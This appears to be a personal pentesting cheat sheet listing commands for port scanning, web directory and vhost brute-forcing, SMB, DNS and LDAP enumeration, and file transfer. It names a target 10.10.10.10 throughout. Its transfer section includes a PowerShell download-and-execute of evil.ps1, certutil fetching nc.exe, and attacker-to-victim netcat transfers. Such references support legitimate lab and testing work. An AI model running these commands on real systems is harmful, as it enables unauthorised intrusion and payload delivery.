#Pentesting Cheat sheet

#Potential ports vulnerabilities

#Enmeration!

#Port Scanning

Basic port scaning with bash

1
2
3
4
5
for port in {1..65535}; do
  timeout 1 bash -c "echo >/dev/tcp/10.10.10.10/$port" &&
    echo "[*] $port is open" ||
    echo "[*] $port is closed"
done

#NMAP

https://nmap.org/

Scripts define a list of categories they belong to. Currently defined categories are auth, broadcast, brute, default. discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln. Category names are not case sensitive. 

1
ls /urs/share/nmap/scripts

First nmap agressive scan for see all open ports

1
nmap -T5  -p- --open -v -n 10.10.10.10

When I have all open ports, I can do the second scan for enumeration with default script and the versions of the ports. Parameters -sC equals –script=default

1
nmap -sC -sV -p22,80,445 10.10.10.10

ARP Scan

1
nmap -n -sn -PR 10.10.10.10/24

Reverse DNS Lookup

1
nmap -sL 10.10.10.10/24

Using script 

1
nmap -n -Pn --script "vuln and safe" 10.10.10.10/24

#HTTP TOOLS

#Nikto

https://github.com/sullo/nikto

Nikto it’s nice tool to examine a web server to find potential problems and security vulnerabilities.

Basic usage

1
nikto -host https://10.10.10.10/

#Gobuster

https://github.com/OJ/gobuster

It’s a tool for use brute-force folders and multiple extensions at once.

It has three main modes it can be used with:

dir - the classic directory brute-forcing mode
dns - DNS subdomain brute-forcing mode
vhost - virtual host brute-forcing mode

DIR mode 

1
gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://10.10.10.10 -x php,txt,html,cgi

DNS mode

1
gobuster dns -d domain.com -w wordlist.txt -i

vhost mode

1
gobuster vhost -u domain.com -w wordlist.txt -v

#WFUZZ

https://github.com/xmendez/wfuzz

Other tool for use brute-force like gobuster. I don’t want to do the same then i will to put some example for scan a machine while HTTP are not accessible. We can return the ports request. 

1
wfuzz -c --hc=404 -z range,1-65535 http://10.10.10.10:8080/request_to=http://127.0.0.1:FUZZ

#FFUF

https://github.com/ffuf/ffuf

This tool I realy like, because it’s written in go and i thik it’s the most faster for do this jobs.
This code works for scan a VHOST and the web page return every time the same size every time. 

1
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://domain.com -H "Host: FUZZ.domain.com" -fs 33 -fc 401,403

#DIRSEARCH

https://github.com/maurosoria/dirsearch

This written in python. I like this tool becase it’s very fastter too and easy to use.

This is my basic usage, do recursive.

1
dirsearch -u http://domain.com -E -r -w /usr/share/wordlist/wordlist.txt

#SMB SERVICE

This protocol enable to access files on remote server, as well other resources, including printers.

#Llist all folders

1
2
3
4
5
smbclient -L 10.10.10.10

smbmap -H 10.10.10.10

/usr/share/doc/python3-impacket/examples/smbclient.py "" @10.10.10.10

#Generate a samba server with Impacket

https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py

#Make server on Linux

1
impacket-smbserver IGH /root/shells

#Mount in Windows

powershell 

1
New-PSDrive -Name "IGH" -PSProvider "Filesystem" -Root "\\10.10.10.10\IGH"

without powershell

1
net use z: \\10.10.10.10\IGH"

#Mount in Linux

Is needed to have isntalled cifs-utils

1
sudo mount -t cifs //10.10.10.10/igh ~/my-share/

#Enumeration null sessions

1
2
3
smbclient -L 10.10.10.10 -N

rpcclient -U "" -N 10.10.10.10

#Escaning with enum4linux

1
enum4linux -a 10.10.10.10

#DNS

#Nmap DNS hostmanes lookup

1
nmap -f -dns-server [IP DNS] [target ip range]

Host lookup 

1
host -t ns 10.10.10.10

Perform DNS IP Lookup

1
dig a 10.10.10.10 @nameserver

Perform MX Record Lookup

1
dig mx 10.10.10.10 @nameserver

Perform Zone Transfer with dig

1
dig axfr 10.10.10.10 @nameserver

Windows DNS zone Transfer

1
nslookup -> set type=any -> ls -d 10.10.10.10

Linux DNS Zone Transfer 

1
dig axfr 10.10.10.10 @nameserver

DNS Brute Force 

1
dnsrecon -d 10.10.10.10 -d /usr/share/wordlist/dnsmap.txt -t std --xml output.xml

#LDAP SERVICE

Anonymous authentication, you will be able to perform a LDAP search query without binding to the admin account.

1
ldapsearch -h 10.10.10.10 -p 389 -x -b "dc=internetghost,dc=com"

Admin account, sometimes you may to run ldap queries as the admin in order to have additionnal information presented to you.

1
ldapsearch -x -b "dc=internetghost,dc=com" -H ldap://10.10.10.10 -D "cn=admin,dc=internetghost,dc=com" -W

#Transfer files

#HTTP

#PYTHON

You can create a temporal http server with python

1
python3 -m http.server 8000
1
python2 -m SimpleHTTPServer 8000

It also can specify which path to share

1
python3 -m http.server 8000 --dir /root/shells

#WINDOWS

1
2
3
4
5
iex(new-object net.webclient).downloadstring("http://10.10.10.10/evil.ps1)

certutil.exe -urlcache -split -f "http://10.10.10.10/nc.exe" nc.exe

IWR -Uri "http://10.10.10.10/n64.exe" -Outfile "n64.exe"

#LINUX

1
curl http://10.10.10.10/evil.php

#NETCAT

Hacker Machine

1
nc -lvnp 4444 < file

Victim machine 

1
nc 10.10.10.10 4444 > file

#SSH - SCP

The methodology is the same, but I prefer transfer write different methods in this example.

1
2
3
4
5
# file
spc /local/folder/file.txt user@10.10.10.10:/path/folder/file.txt

# folder
spc -r user@10.10.10.10:/folder /path/folder/

#SAMBA

#BASH

1
sudo impacket-smbserver smbFolder $(pwd)

#Powershell

1
2
PS> New-PSDrive -Name "SharedFolder" -PSProvider "FileSystem" -Root "\\10.10.14.18\smbFolder" 
PS> dir SharedFolder:\

#Using Credentials

1
sudo impacket-smbserver smbFolder $(pwd) -smb2support -user jack -password 1234
1
2
3
PS > $pass= convertto-securestring '1234' -AsPlainText -Force
PS > $cred = New-Object System.Managment.Automation.PSCredential('jack', $pass)
PS > New-PSDrive -Name "SharedFolder" -PSProvider "FileSystem" -Credential $cred  -Root "\\10.10.14.18\smbFolder"